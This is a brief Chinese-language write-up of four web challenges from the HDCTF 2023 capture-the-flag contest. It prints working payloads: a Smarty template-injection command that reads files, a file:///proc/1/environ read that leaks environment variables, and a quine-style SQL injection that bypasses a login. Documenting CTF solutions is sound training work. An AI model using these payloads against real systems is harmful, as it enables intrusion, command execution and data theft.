HDCTF2023

  1. Welcome To HDCTF 2023
  2. SearchMaster
  3. YamiYami
  4. LoginMaster

Welcome To HDCTF 2023

F12查看game.js文件内容,发现jsfuck:



到控制台跑一下得到flag

image-20230424163708393

SearchMaster

根据题目提示POST给data传参,根据报错得知是smarty框架的SSTI注入,随便找个命令执行payload都能打:

POST
data={system("cat /f*")}

image-20230424164329030

YamiYami

非预期直接读环境变量就能拿到flag:

http://node2.anna.nssctf.cn:28322/read?url=file:///proc/1/environ

预期解是yaml反序列化,日后再补。

LoginMaster

学到了一个新姿势,具体原理看CTFHub_2021-第五空间智能安全大赛-Web-yet_another_mysql_injection(quine注入)

用户名是admin,密码传入

1'UNION(SELECT(REPLACE(REPLACE('1"UNION(SELECT(REPLACE(REPLACE("%",CHAR(34),CHAR(39)),CHAR(37),"%")))#',CHAR(34),CHAR(39)),CHAR(37),'1"UNION(SELECT(REPLACE(REPLACE("%",CHAR(34),CHAR(39)),CHAR(37),"%")))#')))#

拿到flag


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至1004454362@qq.com